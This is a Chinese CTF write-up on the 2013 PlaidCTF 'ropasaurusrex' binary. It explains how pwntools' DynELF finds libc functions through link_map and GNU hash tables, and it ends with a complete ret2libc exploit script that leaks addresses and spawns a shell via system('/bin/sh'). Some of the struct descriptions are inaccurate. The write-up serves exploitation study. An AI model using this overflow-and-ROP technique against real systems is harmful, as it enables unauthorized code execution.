前言：

最近看了以下pwntoos的DynELF方法，对其中是如何获取到函数地址的过程很感兴趣，就研究了一下，对通过DT_GNU_HASH获取函数地址的过程有了比较清晰的了解

漏洞：

我这里使用2013-PlaidCTF进行测试，首先老样子看看对应的反汇编代码

主函数如下，首先进入0804841d方法，然后打印对应的内存数据：

0804841d函数中可以看出存在溢出漏洞，漏洞点也就在这里： 

看看保护策略

开启了NX，也就意味着栈中数据没有执行权限，基址重定位和栈保护等都没开启，基本的思路如下：

• 利用栈溢出首先获取read的函数地址。
• 利用相对偏移获取system的函数地址。
• 向bss段写入/bin/sh\x00字符串。
• 调用system函数。

基础：

想理解DynELF的执行，首先需要对link_map和通过hash表找到函数内存加载地址方法有一定的了解，首先讲下link_map：

link_map是在 Linux 下使用的一个数据结构，用于描述动态链接库（共享库）的加载信息。它在动态链接过程中扮演着重要角色，具体的结构如下：

struct link_map {
    struct link_map *l_next;      // 指向下一个 link_map 结构的指针
    struct link_map *l_prev;      // 指向前一个 link_map 结构的指针
    void *l_addr;                 // 共享库的基地址
    char *l_name;                 // 共享库的名称（路径）
    struct ElfW(Dyn) *l_ld;       // 指向 ELF 动态段的指针
    void *l_real;                 // 实际的共享库地址（可能用于不同的加载器）
    void *l_reserved;             // 保留字段，用于未来扩展
    int l_refcount;               // 引用计数，跟踪库的使用情况
    // 可能还有其他字段，依赖于实现
};

其中我们需要关注的l_next，l_real和l_name三个，首先看看网上找的这个图：

下面我们找一下，首先确定第一个link_map地址位于got.plt的第二位

查看0xf7f7ba30对应 link_map结构：

查询下一个0xf7f40000链内容，可以看到为linux-gate.so，这不是我们要找的，跳过直接进入下一个：

进入下一个link_map：0xf7f40410

这里可以看到libc.so是我们需要找的名称，这样就可以根据real获取基质为：0xf7c00000

可以看到正确：

往后再看一个链，可以看到已经结束，此时next为0，表示结束。

这我们就获取到了对应lib的基址，然后我们需要获取libc.so的DT_GNU_HASH，DT_STRTAB，DT_SYMTAB三个地址，这个需要读取l_ld:0xf7e23d2c

l_ld为指向 ELF 文件的动态段（ElfW(Dyn)）的指针，包含共享库的动态信息，如所需的其他库、符号表等

可以直接查看对应的libc的区段，可以看到dynamic地址为00223d2c + 0xf7c00000 = 0xf7e23d2c

正常查看libc.so可以看到 DT_GNU_HASH，DT_STRTAB，DT_SYMTAB对应的标记和偏移

对应可以获取

即对应 DT_GNU_HASH，DT_STRTAB，DT_SYMTAB值

[*] Found DT_GNU_HASH at 0xf7c0466c
[*] Found DT_STRTAB at 0xf7c16c40
[*] Found DT_SYMTAB at 0xf7c09a80

获取到了这三个的地址，下面就要计算其具体的函数地址通过hash，这里读取system的地址，具体的结构图可以参考如下

首先我们看看DT_GNU_HASH结构

struct GnuHash {
    uint32_t nbuckets;   // 桶的数量
    uint32_t symndx;     // 符号表的开始索引
    uint32_t maskbits;    // 掩码位数
    uint32_t shift;       // 用于计算哈希值的位移量
    uint32_t buckets[];   // 桶数组，大小为 nbuckets
    // 后面可能跟着链表和其他数据
};

DT_STRTAB结构如下：

struct Elf32_Dyn {
    int d_tag;               // 动态节标记
    union {
        uint32_t d_val;      // 整数值
        uint32_t d_ptr;      // 指针值
    } d_un;
};

DT_SYMTAB结构如下：

struct Elf32_Dyn {
    int d_tag;               // 动态节标记
    union {
        uint32_t d_val;      // 整数值
        uint32_t d_ptr;      // 指针值
    } d_un;
};

知道了三个的结构，首先我们需要获取桶数组的地址buckets，具体计算方法如下：

buckets = DT_GNU_HASH + sizeof(elf.GNU_HASH) + (elfword * maskwords)

buckets = 0xf7c0466c + 0x10 + (0x00000400 * 4) = 0xF7C0567C

然后需要计算具体的system的hash，计算代码如下：

from pwnlib.util.packing import _need_bytes
def gnu_hash(s):
    """gnu_hash(str) -> int

    Function used to generated GNU-style hashes for strings.
    """
    s = bytearray(_need_bytes(s, 4, 0x80))
    h = 5381
    for c in s:
        h = h * 33 + c
    return h & 0xffffffff
    

print(gnu_hash("system"))

然后将计算的结果和nbuckets进行计算即485418122 % 0x000003f9 = 0x3CB

然后我们需要获取ndx的地址即通过hash计算的数组获取0xF7C0567C + (0x3CB * 4) = 0xF7C065A8下的内容c89，即对应的索引为c89

根据上述获取对应的地址如下

chain = chains + 4 * (ndx - symndx)
chain = 0xF7C06660 + 4 * (0x0c89 - 0x00000014) = 0xF7C09834

然后计算对应的DT_SYMTAB下的地址

sym  = DT_SYMTAB + sizeof(DT_SYMTAB) * (ndx + i)
sym  = 0xf7c09a80 + 0x10 * (0x0c89) = 0xF7C16310 ->0x3019

然后根据获取的偏移地址可以去DT_STRTAB表中找到对应的名称，两个表相同

name = DT_STRTAB + sym 
name = 0xf7c16c40 + 0x3019 = 0xF7C19C59

可以看到0xF7C19C59下为对应的字符串名称system，证明找的地址没错，那么就可以取sym结构中的地址0004dd50为system的偏移地址和机制相加即可获取system的地址

0xf7c00000+0004dd50 = 0xf7c4dd50

通过gun hash计算的方式我们可以获取加载到程序中任意lib的任意函数地址

但是需要远程读取的时候需要注意我们需要能对外打印地址，需要有write或者print等函数进行打印才可以获取到地址，但是当有\00的终止符的时候除write外会有异常终止需要注意

利用： 

最后看下利用方式，首先看看溢出点

0xffffcebc-0xffffce30=8c即140个字符就可以溢出返回地址

这里就需要注意了我们需要溢出返回地址到write，传入参数同时我们还要返回到我们的主函数重复执行，这里需要注意针对write的传参是通过栈而不是寄存器，这样我们就可以构造栈来传入参数：

看下对应的esp值，当前地址内容为0x0804842b，然后是三个参数：

然后执行call，call其实相当于两个功能push+jump push压入下一条地址，jump到指定地址，执行完成后地址如下：

调用系统方法传参通过栈，其内部会将栈的参数传入ebx、ecx、edx

所以我们构造就可构造如下poc

'a'*140 + p32(elf.plt['write']) + p32(start_addr) + p32(1) + p32(addr) + p32(8)

我们通过为write构造p32(1) + p32(addr) + p32(8)参数，然后返回start_addr地址，使得程序能正常执行

但是如何执行我们的system，我们可以先执行read，将输入的内容当作参数传入system中

ssize_t read(int fd, void *buf, size_t count);  

我们只要给一个能写的地址，首先看看哪些地址可以写，使用vmmap

可以看到0x8049000  0x804a000可以写入，然后查下区段，使用：info files 

我们可以写入到bss或data区段，只要可以写入即可

'a'*140 + p32(read_addr) + p32(system_addr) + p32(0) + p32(elf.bss()+100) + p32(8)

由于read使用三个参数，system使用一个参数，当执行完read后进入system会将地址写入p32(0)，将p32(elf.bss()+100当作参数传入并执行。

最后的代码如下：

from pwn import *
import codecs

#context.log_level = 'debug'

pro = 'ropasaurusrex'
#p = remote('127.0.0.1', 10001)
p = process(pro)
elf = ELF(pro)
start_addr = 0x8048340

def leak(addr):
    payload = b'a'*140 + p32(elf.plt['write']) + p32(start_addr)
    payload+= p32(1) + p32(addr) + p32(8)
    p.sendline(payload)
    context = p.recv(8)
    hex_encoded_context = codecs.encode(context, 'hex').decode('utf-8')
    print(b"%#x -> %s -> %s" % (addr, hex_encoded_context.encode('utf-8'),context))
    return context

d = DynELF(leak,elf = elf)


system_addr = d.lookup(b'system',b'libc')

gdb.attach(p, 'b *0x8048416')

read_addr = d.lookup(b'read',b'libc')

print("system_addr: " + hex(system_addr))
print("read_addr: " + hex(read_addr))

#0x0804968c
p.sendline(b'a'*140 + p32(read_addr) + p32(system_addr) + p32(0) + p32(elf.bss()+100) + p32(8))
p.sendline(b'/bin/sh\x00')

p.interactive()

结束~！